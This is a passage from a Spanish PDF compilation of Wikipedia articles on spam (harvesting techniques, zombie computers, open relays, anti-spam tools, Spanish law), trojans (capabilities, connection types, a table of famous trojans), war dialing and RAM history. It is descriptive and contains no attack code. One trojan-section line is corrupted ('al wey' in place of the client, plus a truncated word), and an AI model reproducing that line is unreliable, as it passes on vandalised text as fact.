Spam en redes de IRCTan antiguo como el propio protocolo de IRC, el correo basura en redes de charlas en línea toma auge a raíz de lamasificación de dicho medio de comunicación. Los mensajes no deseados en redes de IRC tiene un coste irrisorio ypor lo tanto son objetivo principal de redes de distribución de contenidos. Los mensajes más habituales suelen tenerpor objetivo la visita de otros canales de chat, la visita de webs y la difusión en general de contenidos de pago.Recientemente se constata la aparición de una nueva modalidad de spam que busca que el usuario perceptor de lapublicidad use la telefonía móvil para contratar servicios de elevado coste. Esta práctica esta penada por la Ley. Enmuchas ocasiones esta actividad es realizada por robots bajo seudónimos atractivos para llamar la atención delusuario. Son habituales los nombres como 'joven_guapa' o 'busco_amor'.

Page 111: Virus informático

Spam 109

Spam en correo postalLa técnicas de bombardeo publicitario han llegado también a los medios convencionales de comunicación. Laenorme bajada relativa de los costes de impresión en papel, desde un folletos de una sola página hasta un catálogopublicitario de varias decenas han hecho que también el envío de correo no solicitado llegue por medio de correopostal. De forma análoga a como ocurre en los medios electrónicos, donde un usuario interesado en un producto queremite sus datos a una empresa puede verse bombardeado por publicidad no deseada de esa u otra empresa, hayempresas especializadas en el buzoneo masivo e indiscriminado de publicidad. Es habitual encontrar en el buzónpostal, publicidad no solicitada introducida masivamente por empresas especializadas o por los propiosdistribuidores finales. Estas acceden a los buzones tanto en la vía pública así como buzones situados en zonasprivativas.

Spam en la vía públicaEn la vía pública son también comunes las prácticas de spam, sobre todo en las ciudades. La colocación depublicidad en lugares no preparados para ello supone un grave deterioro del medio urbano: paredes, postes,vehículos son invadidos por publicidad no solicitada que no en pocos casos acaba en el suelo. Las corporacionesmunicipales pierden mucho dinero por estas prácticas ilegales exentas de control fiscal y además invierten grandescantidades de dinero en la retirada y limpieza del material publicitario dispersado en el medio. En los últimos años seha extendido el llamado "pegatinazo", práctica consistente en colocar pegatinas con publicidad sobre el mobiliariourbano y las edificaciones (servicios de cerrajería, fontanería y electricidad son los más comunes) utilizandopegatinas con adhesivos muy potentes y que se rompen si se intentan retirar dificultando y encareciendo suretirada.[cita requerida]

Spam en los WikisEn los Wikis, los usuarios frecuentan a hacer Spam en las discusiones de otros usuarios, blogs (tanto crearlos comocomentarlos) o en comentarios en la página de discusión de un artículo. Principalmente esto se trata de vandalismo,pero algunas veces los usuarios están pidiendo ayuda para que otro Wiki progrese. La mala intención no aparecesiempre, como ven, pero no deja de ser molesto para los demás.

Técnicas de spam

Obtención de direcciones de correoLos spammers (individuos o empresas que envían correo no deseado) utilizan diversas técnicas para conseguir laslargas listas de direcciones de correo que necesitan para su actividad, generalmente a través de robots o programasautomáticos que recorren internet en busca de direcciones. Algunas de las principales fuentes de direcciones paraluego enviar el correo basura son:• Los propios sitios web, que con frecuencia contienen la dirección de su creador, o de sus visitantes (en foros,

blogs, etc.).[]

• Los grupos de noticias de usenet, cuyos mensajes suelen incluir la dirección del remitente.• Listas de correo: les basta con apuntarse e ir anotando las direcciones de sus usuarios.• Correos electrónicos con chistes, cadenas, etc. que los usuarios de internet suelen reenviar sin ocultar las

direcciones, y que pueden llegar a acumular docenas de direcciones en el cuerpo del mensaje, pudiendo sercapturadas por un troyano o, más raramente, por un usuario malicioso.

• Páginas en las que se solicita tu dirección de correo (o la de "tus amigos" para enviarles la página en un correo)para acceder a un determinado servicio o descarga.[]

• Bases de datos WHOIS.•• Entrada ilegal en servidores.

Page 112: Virus informático

Spam 110

• Por ensayo y error: se generan aleatoriamente direcciones, y se comprueba luego si han llegado los mensajes. Unmétodo habitual es hacer una lista de dominios, y agregarles "prefijos" habituales. Por ejemplo, para el dominiowikipedia.org, probar [email protected], [email protected], [email protected], etc.[]

Envío de los mensajes

Ciclo del SPAM(1): Sitio web de Spammers

(2): Spammer(3): Spamware

(4): ordenadores infectados(5): Virus o troyanos

(6): Servidores de correo(7): Usuarios

(8): Tráfico Web.

Una vez que tienen una gran cantidad dedirecciones de correo válidas (en el sentidode que existen), los spammers utilizanprogramas que recorren la lista enviando elmismo mensaje a todas las direcciones. Estosupone un costo mínimo para ellos, peroperjudica al receptor (pérdidas económicas yde tiempo) y en general a Internet, porconsumirse gran parte del ancho de bandaen mensajes basura.

Verificación de la recepción

Además, es frecuente que el remitente decorreo basura controle qué direccionesfuncionan y cuáles no por medio de webbugs o pequeñas imágenes o similarescontenidas en el código HTML del mensaje.De esta forma, cada vez que alguien lee elmensaje, su ordenador solicita la imagen alservidor de susodicho remitente, que registraautomáticamente el hecho. Son una formamás de spyware. Otro sistema es el deprometer en los mensajes que enviando unmensaje a una dirección se dejará derecibirlos: cuando alguien contesta, significano sólo que lo ha abierto, sino que lo haleído.

Troyanos y ordenadores zombisRecientemente, han empezado a utilizar una técnica mucho más perniciosa: la creación de virus troyanos que seexpanden masivamente por ordenadores no protegidos (sin cortafuegos). Así, los ordenadores infectados sonutilizados por el remitente de correo masivo como "ordenadores zombis", que envían correo basura a sus órdenes,pudiendo incluso rastrear los discos duros o correos nuevos (sobre todo cadenas) en busca de más direcciones. Estopuede causar perjuicios al usuario que ignora haber sido infectado (que no tiene por qué notar nada extraño), al seridentificado como spammer por los servidores a los que envía spam sin saberlo, lo que puede conducir a que no se ledeje acceder a determinadas páginas o servicios. Así, con la potencia de cálculo de todos los ordenadores infectados,pueden mandar el spam fácilmente sin que se enteren los propios usuarios, y pueden incluso mandar un virus alordenador de una empresa importante.Actualmente, el 40% de los mensajes no deseados se envían de esta forma.

Page 113: Virus informático

Spam 111

Servidores de correo mal configuradosLos servidores de correo mal configurados son aprovechados también por los remitentes de correo no deseado. Enconcreto los que están configurados como Open Relay. Estos no necesitan un usuario y contraseña para que seanutilizados para el envío de correos electrónicos. Existen diferentes bases de datos públicas que almacenan losordenadores que conectados directamente a Internet permiten su utilización por susodichos remitemtes. El másconocido es la Open Relay DataBase.

Medidas para evitar correo no deseadoA pesar que no existen técnicas infalibles para protegerse del correo basura, los expertos en seguridad informáticarecomiendan una serie de acciones para reducir la cantidad de correo electrónico no deseado:•• Usar una imagen para la dirección de correo electrónico.• En vez de poner el enlace a tu cuenta, usa una redirección (puede ser temporal o por un número de usos), y

bórrala cuando recibas excesivos mensajes no deseados.•• Modificar la dirección para evitar el rastreo automático.En los grupos de noticias y listas de correo:•• No poner el remitente verdadero en las publicaciones enviados.•• Si el archivo de mensajes a la lista es visible desde web, cambiar las direcciones de remite por una imagen,

ocultarlas, o escribirlas de forma que sea difícil reconocerla como tal para un programa.•• Para evitar correo no deseado en una lista:

•• El foro puede estar moderado, para evitar mensajes inadecuados.•• Rechazar correos de usuarios no suscritos a la lista.•• Utilizar la clave del correo exclusivamente para éste. no utilizarla en ninguna otra página.

Proyectos y servicios contra el correo basura

Cartel anti SPAM.

• SPF: Tecnología creada para verificar que los remitentes de los mensajesde correo son quienes dicen ser.

• DomainKeys: Otra tecnología que sirve para lo mismo que SPF y queademás asegura que los emails no han sido modificados.

• SenderID:[14] Tecnología de Microsoft que pretende competir con SPF,incluso utilizando esas mismas siglas para una tecnología que en lapráctica es distinta.[15] En realidad SenderID utiliza consultas DNSparecidas a SPF sólo como primer paso de su proceso,[16] que involucratambién filtros antispam basados en contenido. SenderID ha sido adoptadopor hotmail.[17] En la práctica esto obliga a adoptar esta tecnología o verseexcluido de esas direcciones,[18] que suponen unos 260 millones deusuarios en todo el mundo.[19] No obstante, los resultados de su tecnología, y/o otras medidas paralelas adoptadas,están causando serios problemas en dominios enteros en todo el mundo.[20][21]

• Proyectos como el proyecto Harvester y el emailharvest recopilan IPs de spammers para bloquearlas medianteuna trampa. Ponen direcciones de correo que indican la dirección del remitente de correo masivo y cuando élenvía un mensaje a esa dirección se sabe desde qué dirección fue capturada, con lo que puede filtrar al remitente.

•• Redirecciones temporales.

Page 114: Virus informático

Spam 112

LegislaciónEn España el correo electrónico no solicitado está terminantemente prohibido por la Ley de Servicios de la Sociedadde la Información y de Comercio Electrónico (LSSICE), publicada en el BOE del 12 de julio de 2002, salvo lodispuesto en el art. 19.2. "En todo caso, será de aplicación la Ley Orgánica 15/1999, de 13 de diciembre, deProtección de Datos de Carácter Personal, y su normativa de desarrollo, en especial, en lo que se refiere a laobtención de datos personales, la información a los interesados y la creación y mantenimiento de ficheros de datospersonales."De hecho, las sentencias en España referidas al correo electrónico no solicitado están relacionadas con esta ley; sinembargo, dicha ley no hace mención de la palabra "Spam", sino al nombre "comunicaciones comerciales enviadaspor medios electrónicos".En Estados Unidos se promulgó la ley CAN-SPAM, que ha sido prácticamente inefectiva.

EspañaEn España es posible la denuncia del correo masivo ante la Agencia Española de Protección de Datos que es lacompetente para perseguirlo, en caso que el correo basura sea de origen español. Esta práctica está sancionada en elel Art.19.2 que dispone que a todo lo referente al envío de comunicaciones electrónicas será aplicable la LOPD y elartículo 21 de la Ley 34/2002, de 11 de Julio de Servicios de la Sociedad de Información y Comercio Electrónico(LSSI) que dispone:

Prohibición de comunicaciones comerciales realizadas a través de correo electrónico o medios decomunicación electrónica equivalentes.

1.1. Queda prohibido el envío de comunicaciones publicitarias o promocionales por correo electrónico u otromedio de comunicación electrónica equivalente que previamente no hubieran sido solicitadas o expresamenteautorizadas por los destinatarios de las mismas.

2.2. Lo dispuesto en el apartado anterior no será de aplicación cuando exista una relación contractual previa,siempre que el prestador hubiera obtenido de forma lícita los datos de contacto del destinatario y losempleara para el envío de comunicaciones comerciales referentes a productos o servicios de su propiaempresa que sean similares a los que inicialmente fueron objeto de contratación con el cliente.

En todo caso, el prestador deberá ofrecer al destinatario la posibilidad de oponerse al tratamiento de susdatos con fines promocionales mediante un procedimiento sencillo gratuito, tanto en el momento de recogidade los datos como en cada una de las comunicaciones comerciales que le dirija.

El régimen sancionador de la LSSI clasifica las infracciones por SPAM en:•• Infracciones graves:

... c) El envío masivo de comunicaciones comerciales por correo electrónico u otro medio decomunicación electrónica equivalente o el envío, en el plazo de un año, de más de tres comunicacionescomerciales por los medios aludidos a un mismo destinatario, cuando en dichos envíos no se cumplanlos requisitos establecidos en el artículo 21.

•• Infracciones leves:

... d) El envío de comunicaciones comerciales por correo electrónico u otro medio de comunicaciónelectrónica equivalente cuando en dichos envíos no se cumplan los requisitos establecidos en el artículo21 y no constituya infracción grave.

Y finalmente dispone las sanciones siguientes:•• Artículo 39. Sanciones.

1. Por la comisión de las infracciones recogidas en el artículo anterior, se impondrán las siguientes sanciones: a) Por la comisión de infracciones muy graves, multa de 150.001 hasta 600.000 euros. b)

Page 115: Virus informático

Spam 113

Por la comisión de infracciones graves, multa de 30.001 hasta 150.000 euros. c) Por la comisión deinfracciones leves, multa de hasta 30.000 euros.

• Artículo 45. Prescripción, respecto a la prescripción de las infracciones:Las infracciones muy graves prescribirán a los tres años, las graves a los dos años y las leves a los seismeses, las sanciones impuestas por faltas muy graves prescribirán a los tres años, las impuestas porfaltas graves a los dos años y las impuestas por faltas leves al año.

Referencias[1] (http:/ / science. howstuffworks. com/ innovation/ edible-innovations/ spam-food2. htm)[2] (http:/ / www. businessweek. com/ articles/ 2012-05-17/ how-spam-meat-has-survived-spam-e-mail)[3] Información del término spam en foros (http:/ / www. todopsp. com/ foros/ showthread. php?t=22910)[4] Reaction to the DEC Spam of 1978 (http:/ / www. templetons. com/ brad/ spamreact. html) (en inglés)[5][5] Monty Python's Flying Circus, BBC, 2nd. series, episodio 25 (15 de diciembre de 1970). Según[6] Brad Templeton: Origin of the term "spam" to mean net abuse (http:/ / www. templetons. com/ brad/ spamterm. html), citado por Mansilla.[7] Akismet (http:/ / www. akismet. com/ )[8] Informe de Retarus sobre spam en junio del 2008: "Viagra" supera a "Rolex" (http:/ / ivr. tmcnet. com/ news/ 2008/ 07/ 03/ 3529512. htm)[9] Say good bye to viagra, rolex and other unwanted bogus emails... (http:/ / www. spamsafemail. com/ index. html)[10] Avalanche of Viagra ads and Rolex pitches (http:/ / dir. salon. com/ story/ tech/ feature/ 2005/ 01/ 19/ microsoft_spam/ index. html)[11] Recent upsurge in Rolex spam (http:/ / www. well. com/ conf/ inkwell. vue/ topics/ 236/ Brian-McWilliams-Spam-Kings-page02. html)[12] VIAGRA AND ROLEX WATCHES JUNK E-MAILS! (http:/ / www. combat-diaries. co. uk/ diary30/ spam viagra, rolex. htm)[13] Información del término spam en foros (http:/ / www. todopsp. com/ foros/ showthread. php?t=22910)[14] Microsoft Sender ID Home Page (http:/ / www. microsoft. com/ mscorp/ safety/ technologies/ senderid/ default. mspx)[15] Is SPF the same thing as Sender ID? (http:/ / www. openspf. org/ SPF_vs_Sender_ID)[16] Sender ID Framework Overview (http:/ / www. microsoft. com/ mscorp/ safety/ technologies/ senderid/ overview. mspx)[17] Sender ID Framework Reaches Tipping Point (https:/ / www. microsoft. com/ presspass/ press/ 2007/ apr07/ 04-18SenderIDPR. mspx)[18] Use Sender ID or we'll junk you, says Microsoft (http:/ / www. silicon. com/ research/ specialreports/ thespamreport/

0,39025001,39131378,00. htm?r=1)[19] live.com: We Heard You Loud and Clear (http:/ / mailcall. spaces. live. com/ blog/ cns!CC9301187A51FE33!29123. entry)[20] Hotmail's antispam measures snuff out legit emails, too (http:/ / www. theregister. com/ 2007/ 05/ 01/ hotmail_friendly_fire/ )[21] Admins accuse Microsoft of Draconian Hotmail cap (http:/ / www. theregister. com/ 2007/ 10/ 09/ limits_on_hotmail/ )

Bibliografía• Sanz, J. (np). Evaluación de alternativas para reducir el spam (http:/ / www. rediris. es/ mail/ abuso/ doc/

MedidasAntiSPam. pdf). RedIRIS.  pp. 15. Consultado el 4 de junio de 2010.

Enlaces externos• Wikimedia Commons alberga contenido multimedia sobre Spam. CommonsLegislación en España:

• Ley 56/2007, de 28 de diciembre, de Medidas de Impulso de la Sociedad de la Información (http:/ / noticias.juridicas. com/ base_datos/ Admin/ l56-2007. html)

• Ley 34/2002, de 11 de julio, de Servicios de la Sociedad de la Información y de Comercio Electrónico (http:/ /noticias. juridicas. com/ base_datos/ Admin/ l34-2002. html)

• Agencia Española de Protección de Datos (http:/ / www. agpd. es)• The Web Bug FAQ (http:/ / www. eff. org/ Privacy/ Marketing/ web_bug. html)• Breve manual sobre el spam (http:/ / www. telefonica. net/ web2/ jamj/ dat/ manual. pdf)• Noticia que comenta el envío masivo de correo postal a Alan Ralsky, el rey del SPAM (http:/ / www. hispasec.

com/ unaaldia/ 1639)• Entrevista a un spammer (http:/ / www. washingtonpost. com/ wp-dyn/ content/ article/ 2006/ 02/ 14/

AR2006021401342. html), en The Washington Post (en inglés)

Page 116: Virus informático

Troyano (informática) 114

Troyano (informática)

Captura de pantalla del troyano Nuclear RAT

En informática,se denomina troyano o caballo de Troya(traducción literal del inglés Trojan horse) a un software maliciosoque se presenta al usuario como un programa aparentementelegítimo e inofensivo pero al ejecutarlo ocasiona daños.[][] Eltérmino troyano proviene de la historia del caballo de Troyamencionado en la Odisea de Homero.

Los troyanos pueden realizar diferentes tareas, pero, en la mayoríade los casos crean una puerta trasera (en inglés backdoor) quepermite la administración remota a un usuario no autorizado.[1]

Un troyano no es de por sí, un virus informático,aún cuandoteóricamente pueda ser distribuido y funcionar como tal. La diferencia fundamental entre un troyano y un virus,consiste en su finalidad. Para que un programa sea un "troyano" sólo tiene que acceder y controlar la máquinaanfitriona sin ser advertido, normalmente bajo una apariencia inocua. Al contrario que un virus, que es un huéspeddestructivo, el troyano no necesariamente provoca daños porque no es su objetivo.

Evolución históricaLos troyanos se concibieron como una herramienta para causar el mayor daño posible en el equipo infectado. En losúltimos años y gracias al mayor uso de Internet, esta tendencia ha cambiado hacia el robo de datos bancarios oinformación personal.[]

Desde sus orígenes, los troyanos han sido utilizados como arma de sabotaje por los servicios de inteligencia como laCIA, cuyo caso más emblemático fue el Sabotaje al Gasoducto Siberiano en 1982. La CIA instaló un troyano en elsoftware que se ocuparía de manejar el funcionamiento del gasoducto, antes de que la URSS comprara ese softwareen Canadá.[2]

De acuerdo con un estudio de la empresa responsable del software de seguridad BitDefender desde enero hasta juniode 2009, "El número de troyanos está creciendo, representan el 83% del malware detectado".[3]

La siguiente gráfica muestra el porcentaje de malware que representan los troyanos:[cita requerida]

Page 117: Virus informático

Troyano (informática) 115

Propósitos de los troyanosLos troyanos están diseñados para permitir a un individuo el acceso remoto a un sistema. Una vez ejecutado eltroyano, el individuo puede acceder al sistema de forma remota y realizar diferentes acciones sin necesitarpermiso.[4] Las acciones que el individuo puede realizar en el equipo remoto, dependen de los privilegios que tengael usuario en el ordenador remoto y de las características del troyano.[cita requerida]

Algunas de las operaciones que se pueden llevar a cabo en el ordenador remoto son:• Utilizar la máquina como parte de una botnet (por ejemplo para realizar ataques de denegación de servicio o envío

de spam).• Instalación de otros programas (incluyendo otros programas maliciosos).•• Robo de información personal: información bancaria, contraseñas, códigos de seguridad.•• Borrado, modificación o transferencia de archivos (descarga o subida).• Ejecutar o terminar procesos.•• Apagar o reiniciar el equipo.• Monitorizar las pulsaciones del teclado.• Realizar capturas de pantalla.• Ocupar el espacio libre del disco duro con archivos inútiles.•• Monitorización del sistema y seguimiento de las acciones del usuario.•• Miscelánea (acciones "graciosas" tales como expulsar la unidad de cd, cambiar apariencia del sistema, etc.)Hoy en día, dada la popularización de los sistemas para dispositivos móviles y tablets, especialmente aquellos conmenor control en su marketplace de aplicaciones (como Android) son foco de creciente interés para losdesarrolladores de este tipo de malware. En el caso de estos dispositivos, las acciones que un atacante puede llegar arealizar son similares a las anteriores pero dada la naturaleza del dispositivo, el abanico de opciones se amplia:•• Captura de mensajes de texto entrantes y salientes.•• Captura del registro de llamadas.•• Habilidad para acceder (consultar, eliminar y modificar) la agenda de contactos.•• Habilidad para efectuar llamadas y enviar SMS.•• Conocimiento de la posición geográfica del dispositivo mediante GPS.•• Captura de la cámara.•• Y un largo etc.

Características de los troyanosLos troyanos están compuestos principalmente por dos programas: un cliente, que envía las órdenes que se debenejecutar en la computadora infectada, un servidor situado en la computadora infectada, que recibe las órdenes delcliente, las ejecuta y casi siempre devuelve un resultado al programa cliente y, por último, un editor del servidor, elcual sirve para modificarlo, protegerlo mediante contraseñas, unirlo a otros programas para que, al abrir el programatambién se ejecute el servidor, configurar en que puerto deseamos instalar el servidor, etc. Atendiendo a la forma enla que se realiza la conexión entre el cliente y el servidor se pueden clasificar en:•• Conexión directa (el cliente se conecta al servid).•• Conexión inversa (el servidor se conecta al wey).La conexión inversa tiene claras ventajas sobre la conexión directa, esta traspasa algunos firewalls (la mayoría de losfirewall no analizan los paquetes que salen de la computadora, pero que sí analizan los que entran), pueden serusados en redes situadas detrás de un router sin problemas (no es necesario redirigir los puertos) y no es necesarioconocer la dirección IP del servidor.[cita requerida]

Cabe destacar que existen otro tipo de conexiones, que no son de equipo víctima a equipo atacante, sino que utilizan un servidor intermedio, normalmente ajeno a ambos, para realizar el proceso de control. Se suele utilizar para este

Page 118: Virus informático

Troyano (informática) 116

propósito el protocolo IRC o incluso FTP, HTTP u otros.[cita requerida]

Formas de infectarse con troyanosLa mayoría de infecciones con troyanos ocurren cuando se ejecuta un programa infectado con un troyano. Estosprogramas pueden ser de cualquier tipo, desde instaladores hasta presentaciones de fotos. Al ejecutar el programa,este se muestra y realiza las tareas de forma normal, pero en un segundo plano y al mismo tiempo se instala eltroyano. El proceso de infección no es visible para el usuario ya que no se muestran ventanas ni alertas de ningúntipo. Evitar la infección de un troyano es difícil, algunas de las formas más comunes de infectarse son:• Descarga de programas de redes P2P.• Páginas web que contienen contenido ejecutable (por ejemplo controles ActiveX o aplicaciones Java).• Exploits para aplicaciones no actualizadas (navegadores, reproductores multimedia, clientes de mensajería

instantánea).• Ingeniería social (por ejemplo un cracker manda directamente el troyano a la víctima a través de la mensajería

instantánea).• Archivos adjuntos en correos electrónicos y archivos enviados por mensajería instantánea.Debido a que cualquier programa puede realizar acciones maliciosas en un ordenador, hay que ser cuidadoso a lahora de ejecutarlos. Estos pueden ser algunos buenos consejos para evitar infecciones:• Disponer de un programa antivirus actualizado regularmente para estar protegido contra las últimas amenazas.• Disponer de un firewall correctamente configurado. Algunos antivirus lo traen integrado.• Tener instalados los últimos parches y actualizaciones de seguridad del sistema operativo.•• Descargar los programas siempre de las páginas web oficiales o de páginas web de confianza.•• No abrir los datos adjuntos de un correo electrónico si no conoces al remitente.•• Evitar la descarga de software de redes p2p.

Eliminación de troyanosUna de las principales características de los troyanos, es que no son visibles para el usuario. Un troyano puede estarejecutándose en un ordenador durante meses sin que el usuario perciba nada. Esto hace muy difícil su detección yeliminación de forma manual. Algunos patrones para identificarlos son: un programa desconocido se ejecuta aliniciar el ordenador, se crean o borran archivos de forma automática, el ordenador funciona más lento de lo normal,errores en el sistema operativo.Por otro lado los programas antivirus están diseñados para eliminar todo tipo de software malicioso, además deeliminarlos también previenen de nuevas infecciones actuando antes de que el sistema resulte infectado. Es muyrecomendable tener siempre un antivirus instalado en el equipo y a ser posible también un firewall.

Troyanos más famosos

Page 119: Virus informático

Troyano (informática) 117

Nombre Autor Año Conexión Lenguaje

NetBus Carl-Fredrik Neikte 1997 Directa

Back Orifice Sir Dystic 1998 Indirecta

Back Orifice 2000 Dildog 1999 Directa

Sub7 MobMan 1999 Directa

KaoS xKaoS27x 2011 / 2012 Directa / Inversa Español

Bifrost KSV 2004 Directa / Inversa

Bandook Princeali 2005 Directa / Inversa C++

Poison Ivy Shapeless 2007 Inversa

Los más peligrosos entre estos grupos: The KaoS de xKaoS27x y Poison Ivy de Shapeless, estos virus, son muydifíciles de poder detectarlos, incluso algunos antivirus no lo pueden detectar, son mayoritariamente encontrados ensistemas, Windows y Mac Os.Descripción de la anterior tabla:•• Conexión directa: es manipular el software malicioso cuando el computador este encendido, se requiere una

ignición desde la víctima y después, una conexión de manejo para poder manejar el software malicioso.•• Conexión inversa: es manipular el software malicioso por activación automática por parte del mismo, este se

conecta al host que manipula el software, y el host empieza a hacer acciones con el software malicioso.•• Conexión mediante servidor intermedio: es manipular el software malicioso a través de un servidor intermedio,

que actúa como proxy entre cliente y servidor, permitiendo saltar routers y firewalls

Referencias

Enlaces externos• Carnegie Mellon University (1999). « CERT Advisory CA-1999-02 Trojan Horses (http:/ / www. cert. org/

advisories/ CA-1999-02. html)» (en inglés). Consultado el 26/05 de 2010.

Page 120: Virus informático

War dialing 118

War dialingSe conoce como war dialing o demon dialing (en inglés) a una técnica utilizada durante las décadas de los años1980 y 1990, que consistía en hacer llamadas a una serie de números de teléfono automáticamente con el fin deencontrar módems conectados y permitiendo la conexión con algún otro ordenador.El término utilizado originalmente para denominar a esta técnica era daemon dialing, pero debido a su constantemención en la película WarGames como war dialing, éste último pasó a ser el más utilizado.Esta práctica se llevaba a cabo normalmente con el programa ToneLoc para MS-DOS.Hoy en día está en desuso debido a las interconexiones ofrecidas por los proveedores de acceso a Internet.

Memoria de acceso aleatorio

DIMM normal y corriente de memoria RAM tipo DDR3 de 240 contactos.

La memoria de acceso aleatorio (eninglés: random-access memory) seutiliza como memoria de trabajo parael sistema operativo, los programas yla mayoría del software. Es allí dondese cargan todas las instrucciones queejecutan el procesador y otras unidadesde cómputo. Se denominan «de accesoaleatorio» porque se puede leer oescribir en una posición de memoriacon un tiempo de espera igual paracualquier posición, no siendo necesario seguir un orden para acceder a la información de la manera más rápidaposible. Durante el encendido del computador, la rutina POST verifica que los módulos de memoria RAM esténconectados de manera correcta. En el caso que no existan o no se detecten los módulos, la mayoría de tarjetas madresemiten una serie de pitidos que indican la ausencia de memoria principal. Terminado ese proceso, la memoria BIOSpuede realizar un test básico sobre la memoria RAM indicando fallos mayores en la misma.

NomenclaturaLa expresión memoria RAM se utiliza frecuentemente para describir a los módulos de memoria utilizados en loscomputadores personales y servidores. En el sentido estricto, esta memoria es solo una variedad de la memoria deacceso aleatorio: las ROM, memorias Flash, caché (SRAM), los registros en procesadores y otras unidades deprocesamiento también poseen la cualidad de presentar retardos de acceso iguales para cualquier posición. Losmódulos de RAM son la presentación comercial de este tipo de memoria, que se compone de circuitos integradossoldados sobre un circuito impreso independiente, en otros dispositivos como las consolas de videojuegos, la RAMva soldada directamente sobre la placa principal.

Page 121: Virus informático

Memoria de acceso aleatorio 119

Historia

Integrado de silicio de 64 bits sobre un sector de memoria de núcleo magnético(finales de los 60).

4MiB de memoria RAM para un computador VAX de finales de los 70. Losintegrados de memoria DRAM están agrupados arriba a derecha e izquierda.

Módulos de memoria tipo SIPP instalados directamente sobre la placa base.

Uno de los primeros tipos de memoria RAMfue la memoria de núcleo magnético,desarrollada entre 1949 y 1952 y usada enmuchos computadores hasta el desarrollo decircuitos integrados a finales de los años 60 yprincipios de los 70. Esa memoria requería quecada bit estuviera almacenado en un toroide dematerial ferromágnetico de algunos milímetrosde diámetro, lo que resultaba en dispositivoscon una capacidad de memoria muy pequeña.Antes que eso, las computadoras usaban relésy líneas de retardo de varios tipos construidaspara implementar las funciones de memoriaprincipal con o sin acceso aleatorio.

En 1969 fueron lanzadas una de las primerasmemorias RAM basadas en semiconductoresde silicio por parte de Intel con el integrado3101 de 64 bits de memoria y para el siguienteaño se presentó una memoria DRAM de 1024bytes, referencia 1103 que se constituyó en unhito, ya que fue la primera en sercomercializada con éxito, lo que significó elprincipio del fin para las memorias de núcleomagnético. En comparación con los integradosde memoria DRAM actuales, la 1103 esprimitiva en varios aspectos, pero tenía undesempeño mayor que la memoria de núcleos.

En 1973 se presentó una innovación quepermitió otra miniaturización y se convirtió enestándar para las memorias DRAM: lamultiplexación en tiempo de la direcciones dememoria. MOSTEK lanzó la referenciaMK4096 de 4096 bytes en un empaque de 16pines,[1] mientras sus competidores lasfabricaban en el empaque DIP de 22 pines. Elesquema de direccionamiento[2] se convirtióen un estándar de facto debido a la granpopularidad que logró esta referencia deDRAM. Para finales de los 70 los integradoseran usados en la mayoría de computadoresnuevos, se soldaban directamente a las placasbase o se instalaban en zócalos, de manera queocupaban un área extensa de circuito impreso. Con el tiempo se hizo obvio que la instalación de RAM sobre el

Page 122: Virus informático

Memoria de acceso aleatorio 120

impreso principal, impedía la miniaturización , entonces se idearon los primeros módulos de memoria como el SIPP,aprovechando las ventajas de la construcción modular. El formato SIMM fue una mejora al anterior, eliminando lospines metálicos y dejando unas áreas de cobre en uno de los bordes del impreso, muy similares a los de las tarjetas deexpansión, de hecho los módulos SIPP y los primeros SIMM tienen la misma distribución de pines.A finales de los 80 el aumento en la velocidad de los procesadores y el aumento en el ancho de banda requerido,dejaron rezagadas a las memorias DRAM con el esquema original MOSTEK, de manera que se realizaron una seriede mejoras en el direccionamiento como las siguientes:

Módulos formato SIMM de 30 y 72 pines, los últimosfueron utilizados con integrados tipo EDO-RAM.

•• FPM-RAM (Fast Page Mode RAM)

Inspirado en técnicas como el "Burst Mode" usado enprocesadores como el Intel 486,[3] se implantó un mododireccionamiento en el que el controlador de memoria envía unasola dirección y recibe a cambio esa y varias consecutivas sinnecesidad de generar todas las direcciones. Esto supone un ahorrode tiempos ya que ciertas operaciones son repetitivas cuando sedesea acceder a muchas posiciones consecutivas. Funciona comosi deseáramos visitar todas las casas en una calle: después de laprimera vez no seria necesario decir el número de la calleúnicamente seguir la misma. Se fabricaban con tiempos de accesode 70 ó 60 ns y fueron muy populares en sistemas basados en el486 y los primeros Pentium.

•• EDO-RAM (Extended Data Output RAM)

Lanzada en 1995 y con tiempos de accesos de 40 o 30 ns suponíauna mejora sobre su antecesora la FPM. La EDO, también es capaz de enviar direcciones contiguas pero direccionala columna que va utilizar mientras que se lee la información de la columna anterior, dando como resultado unaeliminación de estados de espera, manteniendo activo el búffer de salida hasta que comienza el próximo ciclo delectura.

•• BEDO-RAM (Burst Extended Data Output RAM)

Fue la evolución de la EDO RAM y competidora de la SDRAM, fue presentada en 1997. Era un tipo de memoriaque usaba generadores internos de direcciones y accedía a más de una posición de memoria en cada ciclo de reloj, demanera que lograba un desempeño un 50% mejor que la EDO. Nunca salió al mercado, dado que Intel y otrosfabricantes se decidieron por esquemas de memoria sincrónicos que si bien tenían mucho del direccionamientoMOSTEK, agregan funcionalidades distintas como señales de reloj.

Tecnologías de memoriaLa tecnología de memoria actual usa una señal de sincronización para realizar las funciones de lectura-escritura demanera que siempre esta sincronizada con un reloj del bus de memoria, a diferencia de las antiguas memorias FPM yEDO que eran asíncronas. Hace más de una década toda la industria se decantó por las tecnologías síncronas, ya quepermiten construir integrados que funcionen a una frecuencia superior a 66 MHz.Tipos de DIMMs según su cantidad de Contactos o Pines:• 72-pin SO-DIMM (no el mismo que un 72-pin SIMM), usados por FPM DRAM y EDO DRAM• 100-pin DIMM, usados por printer SDRAM• 144-pin SO-DIMM, usados por SDR SDRAM•• 168-pin DIMM, usados por SDR SDRAM (menos frecuente para FPM/EDO DRAM en áreas de trabajo y/o

servidores)• 172-pin MicroDIMM, usados por DDR SDRAM

Page 123: Virus informático

Memoria de acceso aleatorio 121

•• 184-pin DIMM, usados por DDR SDRAM• 200-pin SO-DIMM, usados por DDR SDRAM y DDR2 SDRAM• 204-pin SO-DIMM, usados por DDR3 SDRAM• 240-pin DIMM, usados por DDR2 SDRAM, DDR3 SDRAM y FB-DIMM DRAM•• 244-pin MiniDIMM, usados por DDR2 SDRAM

Memorias RAM con tecnologías usadas en la actualidad.

SDR SDRAM

Memoria síncrona, con tiempos de accesode entre 25 y 10 ns y que se presentan enmódulos DIMM de 168 contactos. Fueutilizada en los Pentium II y en los PentiumIII , así como en los AMD K6, AMD AthlonK7 y Duron. Está muy extendida la creenciade que se llama SDRAM a secas, y que ladenominación SDR SDRAM es paradiferenciarla de la memoria DDR, pero noes así, simplemente se extendió muy rápidola denominación incorrecta. El nombrecorrecto es SDR SDRAM ya que ambas (tanto la SDR como la DDR) son memorias síncronas dinámicas. Los tiposdisponibles son:

